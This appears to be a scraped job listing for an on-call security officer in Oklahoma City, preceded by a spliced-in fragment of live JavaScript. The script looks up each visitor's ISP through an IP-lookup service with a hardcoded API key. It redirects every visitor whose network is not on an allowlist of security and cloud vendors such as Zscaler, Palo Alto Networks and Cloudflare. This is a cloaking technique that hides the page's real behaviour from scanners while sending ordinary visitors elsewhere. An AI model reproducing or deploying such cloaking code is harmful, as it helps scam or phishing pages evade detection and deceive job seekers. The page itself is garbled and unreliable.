Security Officer (On-Call)
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Security Officer to join our team in Oklahoma City, OK, on an on-call basis, earning $17.74/hr.
Responsibilities include:
- Monitoring and patrolling assigned premises to ensure safety and security.
- Conducting security checks and inspections to prevent theft, vandalism, and unauthorized access.
- Responding promptly to alarms, incidents, and emergencies while following established protocols.
- Maintaining detailed logs of activities, incidents, and observations.
- Providing assistance and directions to visitors and staff as needed.
Skills needed:
- Strong observational and communication skills.
- Ability to remain alert and attentive during shifts.
- Problem-solving and quick decision-making abilities.
- Basic knowledge of security procedures and protocols.
Benefits include flexible scheduling, competitive hourly pay, and opportunities for training and development. Join us to help maintain a safe environment for all.